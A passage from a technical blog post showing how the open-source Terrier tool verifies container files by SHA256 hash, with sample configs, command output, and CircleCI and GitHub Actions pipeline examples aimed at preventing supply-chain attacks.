to our <code>merged</code> folder. We have kept the two hashes from the previous section.</p> <p>If we run Terrier with this configuration from the location <code>/var/lib/docker/overlay2/04f84ddd30a7df7cd3f8b1edeb4fb89d476ed84cf3f76d367e4ebf22cd1978a4/</code>, we get the following output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="o">[</span>+] Loading config: cfg.yml <span class="o">[</span>+] Analysing Container <span class="o">[!]</span> Found matching instance of <span class="s1">'82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd'</span> at: merged/usr/local/go/bin/go with <span class="nb">hash</span>:82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd </code></pre> </div> <p>From the output above, we know that the container (<code>b9e676fd7b09</code>) does not contain the malicious Python package but it does contain an instance of the Golang binary which is located at <code>merged/usr/local/go/bin/go</code>.</p> <h3> Identifying and verifying specific files in containers </h3> <p>And as you might have guessed, Terrier can also be used to verify and identify files at specific paths in containers. To do this, we need the following:</p> <ol> <li>Location of the container’s <code>merged</code> folder </li> <li>A SHA256 hash of a specific file/s</li> <li>The path and name of the specific file/s</li> </ol> <p>The points above can be determined using the same procedures described in the previous sections. Below is an example Terrier config file that we could use to identify and verify components in a running container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">container</span> <span class="na">path</span><span class="pi">:</span> <span class="s">merged</span> <span class="na">verbose</span><span class="pi">:</span> <span class="kc">true</span> <span class="na">files</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/usr/bin/curl'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/usr/local/go/bin/go'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd'</span> </code></pre> </div> <p>If we run Terrier with the above config, we get the following output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="o">[</span>+] Loading config: cfg.yml <span class="o">[</span>+] Analysing Container <span class="o">[!]</span> Found matching instance of <span class="s1">'/usr/bin/curl'</span> at: merged/usr/bin/curl with <span class="nb">hash</span>:9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96 <span class="o">[!]</span> Found matching instance of <span class="s1">'/usr/local/go/bin/go'</span> at: merged/usr/local/go/bin/go with <span class="nb">hash</span>:82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91 dd3ff92dd <span class="o">[!]</span> All components were identified: <span class="o">(</span>2/2<span class="o">)</span> <span class="o">[!]</span> All components were identified and verified: <span class="o">(</span>2/2<span class="o">)</span> <span class="nv">$ </span><span class="nb">echo</span> <span class="nv">$?</span> 0 </code></pre> </div> <p>From the output above, we can see that Terrier was able to successfully identify and verify all the files in the running container. The return code is also <code>0</code> which indicates a successful execution of Terrier.</p> <h3> Using Terrier with CI/CD </h3> <p>In addition to Terrier being used as a standalone CLI tool, Terrier can also be integrated easily with existing CI/CD technologies such as GitHub Actions and CircleCI. Below are two example configurations that show how Terrier can be used to identify and verify certain components of Docker files in a pipeline and prevent the pipeline from continuing if all verifications do not pass. This can be seen as an extra mitigation for supply-chain attacks.</p> <p>Below is a CircleCI example configuration using Terrier to verify the contents of an image.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">version</span><span class="pi">:</span> <span class="m">2</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">build</span><span class="pi">:</span> <span class="na">machine</span><span class="pi">:</span> <span class="kc">true</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">checkout</span> <span class="pi">-</span> <span class="na">run</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Build Docker Image</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">docker build -t builditall .</span> <span class="pi">-</span> <span class="na">run</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Save Docker Image Locally</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">docker save builditall -o builditall.tar</span> <span class="pi">-</span> <span class="na">run</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Verify Docker Image Binaries</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">./terrier</span> </code></pre> </div> <p>Below is a Github Actions example configuration using Terrier to verify the contents of an image.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">name</span><span class="pi">:</span> <span class="s">Go</span> <span class="na">on</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">push</span><span class="pi">]</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">build</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Build</span> <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Get Code</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@master</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Build Docker Image</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">docker build -t builditall .</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Save Docker Image Locally</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">docker save builditall -o builditall.tar</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Verify Docker Image Binaries</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">./terrier</span> </code></pre> </div> <h2> Conclusion </h2> <p>In this blog post, we have looked at how to perform multiple actions on Docker (and OCI) containers and images via Terrier. The actions performed allowed us to identify specific files according to their hashes in images and containers. The actions performed have also allowed us to identify and verify multiple components in images and containers. These actions performed by Terrier are useful when attempting to prevent certain supply-chain attacks.</p> <p>We have also seen how Terrier can be used in a DevOps pipeline via GitHub Actions and CircleCI.</p> <p>Learn more about Terrier on GitHub at <a href="https://github.com/heroku/terrier">https://github.com/heroku/terrier</a>.</p> docker security opensource